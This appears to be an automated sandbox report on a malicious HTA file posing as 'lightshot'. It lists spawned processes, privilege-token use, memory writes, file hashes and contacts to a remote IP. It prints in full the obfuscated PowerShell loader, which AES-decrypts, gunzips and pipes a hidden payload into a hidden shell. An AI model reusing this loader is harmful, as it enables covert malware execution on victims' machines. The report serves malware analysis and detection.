memory/2416-2-0x0000000072250000-0x00000000727FB000-memory.dmp

memory/2416-3-0x0000000072250000-0x00000000727FB000-memory.dmp

memory/2416-4-0x00000000026F0000-0x0000000002730000-memory.dmp

memory/2416-5-0x00000000026F0000-0x0000000002730000-memory.dmp

memory/2416-6-0x0000000072250000-0x00000000727FB000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 946a7636a5f35163fb6100aeca1b989a
SHA1 6c6243f68820cdda9cd92d49cfadd0866732983c
SHA256 ae3453c8377ed232dc8322f88c7f5cf78a411de8e72c6dc22705675fcafefdc5
SHA512 1a6027ad1cd889a502788ecc8277310e86e1be810124e4977a609b573b4574502be87906eb0649c757a2102c7563efb3b14563cf6c4b1a9fc448734ba691f26b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BTVKK3BKSRZFWS4OKQ3G.temp

MD5 946a7636a5f35163fb6100aeca1b989a
SHA1 6c6243f68820cdda9cd92d49cfadd0866732983c
SHA256 ae3453c8377ed232dc8322f88c7f5cf78a411de8e72c6dc22705675fcafefdc5
SHA512 1a6027ad1cd889a502788ecc8277310e86e1be810124e4977a609b573b4574502be87906eb0649c757a2102c7563efb3b14563cf6c4b1a9fc448734ba691f26b

memory/2752-17-0x0000000071BF0000-0x000000007219B000-memory.dmp

memory/2752-20-0x0000000002760000-0x00000000027A0000-memory.dmp

memory/2752-23-0x0000000071BF0000-0x000000007219B000-memory.dmp

memory/2272-26-0x0000000002090000-0x00000000020D0000-memory.dmp

memory/2272-30-0x0000000071BF0000-0x000000007219B000-memory.dmp

memory/2752-31-0x0000000071BF0000-0x000000007219B000-memory.dmp

memory/2272-32-0x0000000071BF0000-0x000000007219B000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted 2023-12-01 18:16
Reported 2023-12-01 18:19
Platform win10v2004-20231127-en
Max time kernel 91s
Max time network 118s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\lightshot.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3624 wrote to memory of 4300 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3624 wrote to memory of 4300 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3624 wrote to memory of 4300 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4300 wrote to memory of 2816 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4300 wrote to memory of 2816 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4300 wrote to memory of 2816 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 1512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 1512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 1512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\lightshot.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $bjKJNucK = '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';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS | powershell - }

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c powershell.exe $bjKJNucK = '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';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS | powershell -

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe $bjKJNucK = 'AAAAAAAAAAAAAAAAAAAAAP6K+v/ILIzonFqWY3aMyfu65Aitbvrdlf1JTR+VHM/93Pf7W9XSL9oKmFg9V+qy7eBG0S0HcDJtKhMRJ3Q9l7qhshHWmSGG8dKhKozh29fz02LJqF75p00XN+M8aChOLhiqviflbGu7cJqrbrWEVM7I+svNVeMHi6RuXQg3kyji0gso+E8HnnYMnLf63ehVx7vxZM1uNnQOjwScVjqGSm+URXGtIivHGvS7vky4GJZoZsxf9RpCqeVgXa+3SYd3lT+/+i5jaP4JR3SIEZQkfN4AsMHwqS+l2uMmKP4+eY38Xpo7CromP9x0lgF9/+BppwkdSfBvKvcCwokBDbD9QX0rmGMo+aov1Pa6JMsUJndxd7gXYZ4NJgIxfsx3nG11k/xyeA3FKb9M5uN34DguAT8bLbYW0/uunjQ7jci7sDSqFGwM7cVHsu4uQ/vxCWA/VsIKoOpCnJsqL9e7yfTQZd8ZledgaTqPAiksHr6qeF2DrDm6GXq3tlt+swecebAo1zXCmXTtzABYsfOV3gKMT2wGmUa7+uZhQ2P27JDH936ZqiCjJhqDl0xxeHPOL0kSdCguQBfNCliXAOw0QT2did2+iIqeoIjfoocDqNEJhNhCCzeCOn2vP07dnK9t/mvilfzeTZnmj743sAV12jWIOTHgc/e4Q4N2+Rx9yp2vT1yz5c5HnhSztHp9gvRm0I/7U5UzD0KwVsJgs0usZMkANdJIBC+a5JNnLOv+mAQAufTMUMZULnuHz/rBoZTqw37f7chwuwDV6ZxoGqp2MbPqCgeFKQgIefOApO7TTNXN6yMHo0mWEKwTL7MKX2H8CjHqVMbhmQkkJkL+2XytOm7uFf2JB2OB+vcXheFaViJYbxyQz/VZC7uSNX21qrWcvFBOqJDTAQDXy6Uyj6yKKEYT0Hj5nHpOf6eaKo10Yx4GqfU1';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, $SRSPF.Length - 16);$qxBNht.Dispose();$ITITdV = New-Object System.IO.MemoryStream( , $OPUtZnWeo );$RQtKC = New-Object System.IO.MemoryStream;$YabURCXiy = New-Object System.IO.Compression.GzipStream $ITITdV, ([IO.Compression.CompressionMode]::Decompress);$YabURCXiy.CopyTo( $RQtKC );$YabURCXiy.Close();$ITITdV.Close();[byte[]] $OZoVjmy = $RQtKC.ToArray();$NALOS = [System.Text.Encoding]::UTF8.GetString($OZoVjmy);$NALOS

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 209.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
EE 185.123.53.208:80 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 218.240.110.104.in-addr.arpa udp
EE 185.123.53.208:80 tcp
US 8.8.8.8:53 193.78.101.95.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tml2yce1.lj4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 def65711d78669d7f8e69313be4acf2e
SHA1 6522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256 aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA512 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 360a15f45a9e5bdf1251023a6b1df0ea
SHA1 d6a3643b8ebb2dc29b51d259bdf270ddaa7d6c18
SHA256 acc0e3dfaea599f208571597633c7f1b0647fa3d315910fcf2243f2a9b812190
SHA512 46ec4adfd60fe1b69c5cac0a890fee90b0af3089c93e69e652e303239084c76c3e6a16b75c0197c12f0932c9a310b1e0f2113fdc3710f80739f051e99fefc697
